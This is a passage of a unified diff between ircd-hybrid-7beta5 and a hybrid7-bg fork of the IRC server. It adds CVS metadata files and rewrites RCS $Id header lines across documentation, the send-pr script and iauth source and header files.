diff -uNrd ircd-hybrid-7beta5/doc/old/CVS/Entries hybrid7-bg/doc/old/CVS/Entries
--- ircd-hybrid-7beta5/doc/old/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/doc/old/CVS/Entries	Wed Jul 24 18:31:58 2002
@@ -0,0 +1,8 @@
+/Authors/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/Etiquette/1.1.1.1/Tue Jun  5 16:35:42 2001//
+/README/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/example.conf.trillian/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/example_old.conf/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/ircd.8/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/simple.conf/1.1.1.1/Tue Jun  5 16:35:43 2001//
+D/US-Admin////
diff -uNrd ircd-hybrid-7beta5/doc/old/CVS/Repository hybrid7-bg/doc/old/CVS/Repository
--- ircd-hybrid-7beta5/doc/old/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/doc/old/CVS/Repository	Wed Jul 24 18:31:58 2002
@@ -0,0 +1 @@
+hybrid7-bg/doc/old
diff -uNrd ircd-hybrid-7beta5/doc/old/CVS/Root hybrid7-bg/doc/old/CVS/Root
--- ircd-hybrid-7beta5/doc/old/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/doc/old/CVS/Root	Wed Jul 24 18:31:58 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/doc/old/US-Admin/CVS/Entries hybrid7-bg/doc/old/US-Admin/CVS/Entries
--- ircd-hybrid-7beta5/doc/old/US-Admin/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/doc/old/US-Admin/CVS/Entries	Wed Jul 24 18:31:58 2002
@@ -0,0 +1,4 @@
+/Networking/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/Operators/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/README/1.1.1.1/Tue Jun  5 16:35:43 2001//
+D
diff -uNrd ircd-hybrid-7beta5/doc/old/US-Admin/CVS/Repository hybrid7-bg/doc/old/US-Admin/CVS/Repository
--- ircd-hybrid-7beta5/doc/old/US-Admin/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/doc/old/US-Admin/CVS/Repository	Wed Jul 24 18:31:58 2002
@@ -0,0 +1 @@
+hybrid7-bg/doc/old/US-Admin
diff -uNrd ircd-hybrid-7beta5/doc/old/US-Admin/CVS/Root hybrid7-bg/doc/old/US-Admin/CVS/Root
--- ircd-hybrid-7beta5/doc/old/US-Admin/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/doc/old/US-Admin/CVS/Root	Wed Jul 24 18:31:58 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/doc/old/example_old.conf hybrid7-bg/doc/old/example_old.conf
--- ircd-hybrid-7beta5/doc/old/example_old.conf	Fri Dec 22 22:32:23 2000
+++ hybrid7-bg/doc/old/example_old.conf	Tue Jun  5 12:35:43 2001
@@ -2,7 +2,7 @@
 #   IRC - Internet Relay Chat, doc/example.conf
 #   Copyright (C) 1992, Bill Wisner
 #
-# $Id: example_old.conf,v 1.1 2000/12/23 03:32:23 db Exp $
+# $Id: example_old.conf,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
 #
 # Example of an old style ircd.conf file, which h7 will not parse
 # but is kept here for historical interest
diff -uNrd ircd-hybrid-7beta5/doc/old/simple.conf hybrid7-bg/doc/old/simple.conf
--- ircd-hybrid-7beta5/doc/old/simple.conf	Fri Dec 22 22:32:23 2000
+++ hybrid7-bg/doc/old/simple.conf	Tue Jun  5 12:35:43 2001
@@ -1,7 +1,7 @@
 # IRC minimal example configuration file
 #
-# $Id: simple.conf,v 1.1 2000/12/23 03:32:23 db Exp $
-# $Id: simple.conf,v 1.1 2000/12/23 03:32:23 db Exp $
+# $Id: simple.conf,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
+# $Id: simple.conf,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
 # 
 # This is a basic ircd.conf that will get you up and running with
 # little or no modifications.  See the example.conf file for more
diff -uNrd ircd-hybrid-7beta5/doc/server-version-info hybrid7-bg/doc/server-version-info
--- ircd-hybrid-7beta5/doc/server-version-info	Sun Feb 18 00:44:45 2001
+++ hybrid7-bg/doc/server-version-info	Tue Jun  5 12:35:42 2001
@@ -1,4 +1,4 @@
-$Id: server-version-info,v 7.10 2001/02/18 05:44:45 wcampbel Exp $
+$Id: server-version-info,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
 Updated for Hybrid 7 (2000/12/28)
 
 When you type /version you will often see something like this:
diff -uNrd ircd-hybrid-7beta5/doc/simple.conf hybrid7-bg/doc/simple.conf
--- ircd-hybrid-7beta5/doc/simple.conf	Wed Jan 24 09:58:45 2001
+++ hybrid7-bg/doc/simple.conf	Tue Jun  5 12:35:42 2001
@@ -1,6 +1,6 @@
 # Hybrid 7 minimal example configuration file
 #
-# $Id: simple.conf,v 7.6 2001/01/24 14:58:45 wcampbel Exp $
+# $Id: simple.conf,v 1.1.1.1 2001/06/05 16:35:42 demond Exp $
 #
 # This is a basic ircd.conf that will get your server running with
 # little modification.  See the example.conf for more specific 
diff -uNrd ircd-hybrid-7beta5/gnats/CVS/Entries hybrid7-bg/gnats/CVS/Entries
--- ircd-hybrid-7beta5/gnats/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/gnats/CVS/Entries	Wed Jul 24 18:31:58 2002
@@ -0,0 +1,4 @@
+/Makefile.in/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/leguin/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/send-pr.in/1.1.1.1/Tue Jun  5 16:35:43 2001//
+D
diff -uNrd ircd-hybrid-7beta5/gnats/CVS/Repository hybrid7-bg/gnats/CVS/Repository
--- ircd-hybrid-7beta5/gnats/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/gnats/CVS/Repository	Wed Jul 24 18:31:58 2002
@@ -0,0 +1 @@
+hybrid7-bg/gnats
diff -uNrd ircd-hybrid-7beta5/gnats/CVS/Root hybrid7-bg/gnats/CVS/Root
--- ircd-hybrid-7beta5/gnats/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/gnats/CVS/Root	Wed Jul 24 18:31:58 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/gnats/send-pr.in hybrid7-bg/gnats/send-pr.in
--- ircd-hybrid-7beta5/gnats/send-pr.in	Wed Dec 20 19:16:28 2000
+++ hybrid7-bg/gnats/send-pr.in	Tue Jun  5 12:35:43 2001
@@ -20,7 +20,7 @@
 # along with GNU GNATS; see the file COPYING.  If not, write to
 # the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
 #
-# $Id: send-pr.in,v 1.1 2000/12/21 00:16:28 ejb Exp $
+# $Id: send-pr.in,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
 
 # The version of this send-pr.
 VERSION=3.113
diff -uNrd ircd-hybrid-7beta5/iauth/CVS/Entries hybrid7-bg/iauth/CVS/Entries
--- ircd-hybrid-7beta5/iauth/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/iauth/CVS/Entries	Wed Jul 24 18:31:59 2002
@@ -0,0 +1,3 @@
+/Makefile.in/1.1.1.1/Tue Jun  5 16:35:43 2001//
+D/include////
+D/source////
diff -uNrd ircd-hybrid-7beta5/iauth/CVS/Repository hybrid7-bg/iauth/CVS/Repository
--- ircd-hybrid-7beta5/iauth/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/iauth/CVS/Repository	Wed Jul 24 18:31:58 2002
@@ -0,0 +1 @@
+hybrid7-bg/iauth
diff -uNrd ircd-hybrid-7beta5/iauth/CVS/Root hybrid7-bg/iauth/CVS/Root
--- ircd-hybrid-7beta5/iauth/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/iauth/CVS/Root	Wed Jul 24 18:31:58 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/iauth/include/CVS/Entries hybrid7-bg/iauth/include/CVS/Entries
--- ircd-hybrid-7beta5/iauth/include/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/iauth/include/CVS/Entries	Wed Jul 24 18:31:58 2002
@@ -0,0 +1,13 @@
+/auth.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/class.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/commands.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/conf.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/iauth.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/log.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/match.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/misc.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/mtree.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/res.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/setup.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/sock.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+D
diff -uNrd ircd-hybrid-7beta5/iauth/include/CVS/Repository hybrid7-bg/iauth/include/CVS/Repository
--- ircd-hybrid-7beta5/iauth/include/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/iauth/include/CVS/Repository	Wed Jul 24 18:31:58 2002
@@ -0,0 +1 @@
+hybrid7-bg/iauth/include
diff -uNrd ircd-hybrid-7beta5/iauth/include/CVS/Root hybrid7-bg/iauth/include/CVS/Root
--- ircd-hybrid-7beta5/iauth/include/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/iauth/include/CVS/Root	Wed Jul 24 18:31:58 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/iauth/include/auth.h hybrid7-bg/iauth/include/auth.h
--- ircd-hybrid-7beta5/iauth/include/auth.h	Tue Jan  4 19:20:01 2000
+++ hybrid7-bg/iauth/include/auth.h	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: auth.h,v 7.5 2000/01/05 00:20:01 wnder Exp $
+ *   $Id: auth.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #ifndef INCLUDED_auth_h
diff -uNrd ircd-hybrid-7beta5/iauth/include/class.h hybrid7-bg/iauth/include/class.h
--- ircd-hybrid-7beta5/iauth/include/class.h	Tue Jan  4 19:20:02 2000
+++ hybrid7-bg/iauth/include/class.h	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: class.h,v 7.2 2000/01/05 00:20:02 wnder Exp $
+ *   $Id: class.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #ifndef INCLUDED_class_h
diff -uNrd ircd-hybrid-7beta5/iauth/include/commands.h hybrid7-bg/iauth/include/commands.h
--- ircd-hybrid-7beta5/iauth/include/commands.h	Tue Jan  4 19:20:02 2000
+++ hybrid7-bg/iauth/include/commands.h	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: commands.h,v 7.2 2000/01/05 00:20:02 wnder Exp $
+ *   $Id: commands.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #ifndef INCLUDED_commands_h
diff -uNrd ircd-hybrid-7beta5/iauth/include/conf.h hybrid7-bg/iauth/include/conf.h
--- ircd-hybrid-7beta5/iauth/include/conf.h	Tue Jan  4 19:20:02 2000
+++ hybrid7-bg/iauth/include/conf.h	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: conf.h,v 7.4 2000/01/05 00:20:02 wnder Exp $
+ *   $Id: conf.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #ifndef INCLUDED_conf_h
diff -uNrd ircd-hybrid-7beta5/iauth/include/iauth.h hybrid7-bg/iauth/include/iauth.h
--- ircd-hybrid-7beta5/iauth/include/iauth.h	Sun Dec 17 21:01:39 2000
+++ hybrid7-bg/iauth/include/iauth.h	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: iauth.h,v 7.5 2000/12/18 02:01:39 cosine Exp $
+ *   $Id: iauth.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #ifndef INCLUDED_iauth_h
diff -uNrd ircd-hybrid-7beta5/iauth/include/log.h hybrid7-bg/iauth/include/log.h
--- ircd-hybrid-7beta5/iauth/include/log.h	Sun Dec 17 21:01:39 2000
+++ hybrid7-bg/iauth/include/log.h	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: log.h,v 7.1 2000/12/18 02:01:39 cosine Exp $
+ *   $Id: log.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #ifndef INCLUDED_log_h
diff -uNrd ircd-hybrid-7beta5/iauth/include/match.h hybrid7-bg/iauth/include/match.h
--- ircd-hybrid-7beta5/iauth/include/match.h	Sun Dec 17 21:01:39 2000
+++ hybrid7-bg/iauth/include/match.h	Tue Jun  5 12:35:43 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: match.h,v 7.1 2000/12/18 02:01:39 cosine Exp $
+ *   $Id: match.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 #ifndef INCLUDED_match_h
 #define INCLUDED_match_h
diff -uNrd ircd-hybrid-7beta5/iauth/include/misc.h hybrid7-bg/iauth/include/misc.h
--- ircd-hybrid-7beta5/iauth/include/misc.h	Mon Sep 13 15:16:09 1999
+++ hybrid7-bg/iauth/include/misc.h	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: misc.h,v 7.3 1999/09/13 19:16:09 wnder Exp $
+ *   $Id: misc.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #ifndef INCLUDED_misc_h
diff -uNrd ircd-hybrid-7beta5/iauth/include/mtree.h hybrid7-bg/iauth/include/mtree.h
--- ircd-hybrid-7beta5/iauth/include/mtree.h	Sun Jan  9 00:59:10 2000
+++ hybrid7-bg/iauth/include/mtree.h	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: mtree.h,v 7.5 2000/01/09 05:59:10 wnder Exp $
+ *   $Id: mtree.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #ifndef INCLUDED_mtree_h
diff -uNrd ircd-hybrid-7beta5/iauth/include/res.h hybrid7-bg/iauth/include/res.h
--- ircd-hybrid-7beta5/iauth/include/res.h	Fri Sep 10 14:14:30 1999
+++ hybrid7-bg/iauth/include/res.h	Tue Jun  5 12:35:43 2001
@@ -1,7 +1,7 @@
 /*
  * iauth/res.h (C)opyright 1992 Darren Reed.
  *
- * $Id: res.h,v 7.2 1999/09/10 18:14:30 wnder Exp $
+ * $Id: res.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #ifndef INCLUDED_res_h
diff -uNrd ircd-hybrid-7beta5/iauth/include/sock.h hybrid7-bg/iauth/include/sock.h
--- ircd-hybrid-7beta5/iauth/include/sock.h	Tue Jan  4 19:20:03 2000
+++ hybrid7-bg/iauth/include/sock.h	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: sock.h,v 7.4 2000/01/05 00:20:03 wnder Exp $
+ *   $Id: sock.h,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #ifndef INCLUDED_sock_h
diff -uNrd ircd-hybrid-7beta5/iauth/source/CVS/Entries hybrid7-bg/iauth/source/CVS/Entries
--- ircd-hybrid-7beta5/iauth/source/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/iauth/source/CVS/Entries	Wed Jul 24 18:31:59 2002
@@ -0,0 +1,14 @@
+/.depend/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/Makefile.in/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/auth.c/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/class.c/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/commands.c/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/conf.c/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/iauth.c/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/log.c/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/match.c/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/misc.c/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/mtree.c/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/res.c/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/sock.c/1.1.1.1/Tue Jun  5 16:35:43 2001//
+D
diff -uNrd ircd-hybrid-7beta5/iauth/source/CVS/Repository hybrid7-bg/iauth/source/CVS/Repository
--- ircd-hybrid-7beta5/iauth/source/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/iauth/source/CVS/Repository	Wed Jul 24 18:31:58 2002
@@ -0,0 +1 @@
+hybrid7-bg/iauth/source
diff -uNrd ircd-hybrid-7beta5/iauth/source/CVS/Root hybrid7-bg/iauth/source/CVS/Root
--- ircd-hybrid-7beta5/iauth/source/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/iauth/source/CVS/Root	Wed Jul 24 18:31:58 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/iauth/source/auth.c hybrid7-bg/iauth/source/auth.c
--- ircd-hybrid-7beta5/iauth/source/auth.c	Sat Jan  8 16:38:48 2000
+++ hybrid7-bg/iauth/source/auth.c	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *  along with this program; if not, write to the Free Software
  *  Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: auth.c,v 7.7 2000/01/08 21:38:48 wnder Exp $
+ *  $Id: auth.c,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #include <stdio.h>
diff -uNrd ircd-hybrid-7beta5/iauth/source/class.c hybrid7-bg/iauth/source/class.c
--- ircd-hybrid-7beta5/iauth/source/class.c	Tue Jan  4 19:20:06 2000
+++ hybrid7-bg/iauth/source/class.c	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: class.c,v 7.2 2000/01/05 00:20:06 wnder Exp $
+ *   $Id: class.c,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #include <stdio.h>
diff -uNrd ircd-hybrid-7beta5/iauth/source/commands.c hybrid7-bg/iauth/source/commands.c
--- ircd-hybrid-7beta5/iauth/source/commands.c	Tue Jan  4 19:20:06 2000
+++ hybrid7-bg/iauth/source/commands.c	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: commands.c,v 7.3 2000/01/05 00:20:06 wnder Exp $
+ *   $Id: commands.c,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #include <stdio.h>
diff -uNrd ircd-hybrid-7beta5/iauth/source/conf.c hybrid7-bg/iauth/source/conf.c
--- ircd-hybrid-7beta5/iauth/source/conf.c	Sat Jan  8 16:38:49 2000
+++ hybrid7-bg/iauth/source/conf.c	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: conf.c,v 7.6 2000/01/08 21:38:49 wnder Exp $
+ *   $Id: conf.c,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #include <stdio.h>
diff -uNrd ircd-hybrid-7beta5/iauth/source/iauth.c hybrid7-bg/iauth/source/iauth.c
--- ircd-hybrid-7beta5/iauth/source/iauth.c	Tue Jan  4 19:20:07 2000
+++ hybrid7-bg/iauth/source/iauth.c	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: iauth.c,v 7.4 2000/01/05 00:20:07 wnder Exp $
+ *   $Id: iauth.c,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #include <stdio.h>
diff -uNrd ircd-hybrid-7beta5/iauth/source/log.c hybrid7-bg/iauth/source/log.c
--- ircd-hybrid-7beta5/iauth/source/log.c	Sun Dec 17 21:01:40 2000
+++ hybrid7-bg/iauth/source/log.c	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: log.c,v 1.1 2000/12/18 02:01:40 cosine Exp $
+ *   $Id: log.c,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #include <stdio.h>
diff -uNrd ircd-hybrid-7beta5/iauth/source/match.c hybrid7-bg/iauth/source/match.c
--- ircd-hybrid-7beta5/iauth/source/match.c	Sun Dec 17 21:01:40 2000
+++ hybrid7-bg/iauth/source/match.c	Tue Jun  5 12:35:43 2001
@@ -22,7 +22,7 @@
  * Cleanup of collapse and match
  * Moved static calls variable to match
  * Added asserts for null pointers
- * $Id: match.c,v 1.1 2000/12/18 02:01:40 cosine Exp $
+ * $Id: match.c,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  *
  */
 
diff -uNrd ircd-hybrid-7beta5/iauth/source/misc.c hybrid7-bg/iauth/source/misc.c
--- ircd-hybrid-7beta5/iauth/source/misc.c	Tue Jan  4 19:20:07 2000
+++ hybrid7-bg/iauth/source/misc.c	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: misc.c,v 7.4 2000/01/05 00:20:07 wnder Exp $
+ *   $Id: misc.c,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #include <stdio.h>
diff -uNrd ircd-hybrid-7beta5/iauth/source/mtree.c hybrid7-bg/iauth/source/mtree.c
--- ircd-hybrid-7beta5/iauth/source/mtree.c	Sun Jan  9 14:49:49 2000
+++ hybrid7-bg/iauth/source/mtree.c	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: mtree.c,v 7.7 2000/01/09 19:49:49 wnder Exp $
+ *   $Id: mtree.c,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 /*
diff -uNrd ircd-hybrid-7beta5/iauth/source/res.c hybrid7-bg/iauth/source/res.c
--- ircd-hybrid-7beta5/iauth/source/res.c	Tue Jan  9 20:00:22 2001
+++ hybrid7-bg/iauth/source/res.c	Tue Jun  5 12:35:43 2001
@@ -4,7 +4,7 @@
  * shape or form. The author takes no responsibility for any damage or loss
  * of property which results from the use of this software.
  *
- * $Id: res.c,v 7.4 2001/01/10 01:00:22 toot Exp $
+ * $Id: res.c,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  *
  * July 1999 - Rewrote a bunch of stuff here. Change hostent builder code,
  *     added callbacks and reference counting of returned hostents.
diff -uNrd ircd-hybrid-7beta5/iauth/source/sock.c hybrid7-bg/iauth/source/sock.c
--- ircd-hybrid-7beta5/iauth/source/sock.c	Sat Jan  8 16:38:51 2000
+++ hybrid7-bg/iauth/source/sock.c	Tue Jun  5 12:35:43 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: sock.c,v 7.7 2000/01/08 21:38:51 wnder Exp $
+ *   $Id: sock.c,v 1.1.1.1 2001/06/05 16:35:43 demond Exp $
  */
 
 #include <stdio.h>
diff -uNrd ircd-hybrid-7beta5/include/CVS/Entries hybrid7-bg/include/CVS/Entries
--- ircd-hybrid-7beta5/include/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/include/CVS/Entries	Wed Sep 18 19:19:45 2002
@@ -0,0 +1,63 @@
+/Makefile.in/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/channel.h/1.12/Fri Jul 19 04:21:47 2002//
+/class.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/client.h/1.13/Wed Jul 24 13:13:18 2002//
+/common.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/config.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/config.h.dist/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/debug.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/dline_conf.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/event.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/fdlist.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/fileio.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/handlers.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/hash.h/1.3/Sun Nov  4 21:07:08 2001//
+/hook.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/hostmask.h/1.2/Mon Jul  2 04:10:33 2001//
+/irc_string.h/1.1.1.1/Tue Jun  5 16:35:43 2001//
+/ircd.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/ircd_defs.h/1.5/Fri Jul 19 04:21:48 2002//
+/ircd_getopt.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/ircd_handler.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/ircd_signal.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/ircdauth.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/linebuf.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/list.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/listener.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/m_info.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/m_kline.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/md5.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/memory.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/modules.h/1.5/Wed Jul 24 13:08:17 2002//
+/motd.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/numeric.h/1.14/Wed Jul 24 13:08:17 2002//
+/packet.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/parse.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/patchlevel.h/1.2/Sun Jun 17 01:24:16 2001//
+/patricia.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/res.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/restart.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/rsa.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/s_auth.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/s_bsd.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/s_conf.h/1.16/Fri Jul 19 04:21:48 2002//
+/s_debug.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/s_gline.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/s_log.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/s_misc.h/1.6/Mon Jul 22 23:56:37 2002//
+/s_serv.h/1.8/Mon Jul 22 23:56:38 2002//
+/s_stats.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/s_user.h/1.3/Sun Jun  9 06:06:03 2002//
+/s_zip.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/scache.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/send.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/setup.h.in/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/setup.h_vms/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/sprintf_irc.h/1.1.1.1/Tue Jun  5 16:35:44 2001//
+/supported.h/1.8/Wed Jul 24 13:08:17 2002//
